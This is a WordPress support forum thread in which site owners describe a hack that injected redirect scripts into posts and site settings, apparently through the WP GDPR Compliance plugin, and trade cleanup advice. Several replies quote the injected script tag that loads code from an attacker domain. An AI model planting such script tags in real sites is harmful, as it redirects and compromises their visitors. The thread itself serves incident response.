Site hacked despite Wordfence

Me too…

I was hacked also 2 days ago, but have fixed it.
Now I saw script in one of the myaccount pages as show below. Is this from hacker also.

script src=’https://forwardmytraffic.com/ad.js?port=5&#8242; type=’text/javascript’></script

Thanks.

i was hacked too (all pages redirected to forwardmytraffic.com in database and alot of scripts added to WordPress’s files)….i am currently cleaning up, will reply when im done

• This reply was modified 6 years, 3 months ago by wasconet.

Can you tell me in what files I need to search for the hacker script?

Syntax Error

You can check the link above if we have similar issue. The fixt posted by @joyous works for me.

But now it seems that in every pages and post, i have to remove the script embedded by the hacker.

Thanks.

I had a similar issue two days ago and was also not able to log in because that was redirected too. I am really not knowladgeable about anything wordpress etc, but I found the following:

the database had a redirect in the first line in wp-options. I restored the siteurl as it should be, and the issue was gone. No idea at that time how the entry got there.

One day later I had the same issue again, albeit to a different url. changed that again, and it works, but curretly trying to dig a bit deeper into the cause. I found a post from nintech:
https://blog.nintechnet.com/critical-vulnerability-in-wp-gdpr-compliance-plugin-massively-exploited/
I have this gdpr plugin installed (thanks to the EU!) and updated this now. It seems the hackers got in right from there. I updated the gdpr plugin, and I am currently running the nintech scanner to see whether there is some remaining infective code in my wordpress installation.
hope it helps!

Hi folks,
Very sorry to hear that your sites were compromised. We’ve seen this domain in hacks resulting from the WP GDPR compliance plugin so if you have that, after the site has been cleaned make sure you update that plugin to the most recent version.

Wordfence has protection against that vulnerability but free users get Firewall rules with a 30 day delay. Updating the GDPR plugin will fix the vulnerability though. If you are having troubles cleaning an option may be to restore the site to a point before the hack and then update all your plugins.

The domain in question has been added to our domain blacklist with a few others that were seen in similar scenarios related to this specific vulnerability. That’s active on free sites instantly so this domain should now be flagged in your scans.

thanks, wfsa.
it is helpful to know GDPR vulnerability is the likely cause. Resetting the siteurl in wp_options and updating GDPR makes the site accessible again and hopefully protected against further attacks from that sort.
I am still concerned there may be some malicious code left somewhere. I am scanning with the nintech scanner and do not have the results yet, but if you have any information what else should be done to make the site safe again would be appreciated.
One further information:
I found forwardmytraffic.com in the re-directed url and in the log report, so I am pretty sure this is the main hack. However, after restoring the url and before knowing about the gdpr vulnerability I got a second re-direct which was to blueeyeswebsite.com. I think it might be a good idea to put that on the blacklist too.
Thanks again

Thanks @artcared!

The only way to be 100% sure would be to restore a backup from before the site was hacked. Otherwise you’ll just have to wait and see. Set Wordfence to scan with “high sensitivity” in the meantime. That’s the recommended option for sites that are suspected to be infected.

Have sent the domain on to our threat intelligence team. Thank you!

My sites got hacked as well.
All the posts have malware code forwardmytraffic.com/ad.js
Any one knows how the hackers break the site? I have remove the code from every single page, but I still cannot find the backdoor code in the files.

BTW, I don’t have WP GDPR plugin, how come still got hacked?

Hi,
our sites also get hacked by the same malware, and we dont have the gdpr plugin!
Is it possible that the malware is inserted directly into the phpadmin?
The files on ftp-area are clean…..only in database we could find the script.
Thanks for ideas.

Actual the script redirected to this site:
“https://blueeyeswebsite.com/lam.php&#8221;

@discogmbh
Hi,
We have the same issues.
Files seem ok, and there is no additional bad looking user account generated.
Everything seems fine with the correct siteurl.
However, just every single post, include image description, got the script malware code.
I have spent hours but haven’t found how they break the site.

Hello everyone,

we’ve been hacked as well on both our websites. I couldn’t say which plugin was responsible but we didn’t update some of the plugins as regularly as we probably should have, so it could have been any of those. Our research suggests that this is a larger attack wave with numerous websites worldwide infected.

We have for now updated all plugins and strengthend our site- and network-security and removed the script from our databases with this SQL command in phpMyAdmin:

UPDATE wp_posts SET post_content = REPLACE ( post_content, “<script src=’https://forwardmytraffic.com/ad.js?port=5&#8242; type=’text/javascript’></script><script src=’https://blueeyeswebsite.com/ad.js&#8217; type=’text/javascript’></script>”, “” );

It seems to do the trick for now. I will update you if the script should find it’s way back into our database.

Here is my actual configuration to detect possible matches for the malware.

Wordpress 4.9.8 (PHP 7.2)
Hosted at Strato Germany
Theme: Kallyas 4.16

Active Plugins:
Google Analytics Dashboard 5.3.7
MailPoet 2.10.2
NinjaFirewall 3.7.2
Quform 2.5.0
UpdraftPlus 2.15.5.24
Yoast SEO Premium 9.2.1

At the moment my sites are clean.
Thanks to @empowersource for the mysql-script.
I hope I do not have to use it anymore… ??

Wordfence dont find anything, testing now NinjaFirewall.

• This reply was modified 6 years, 3 months ago by discogmbh.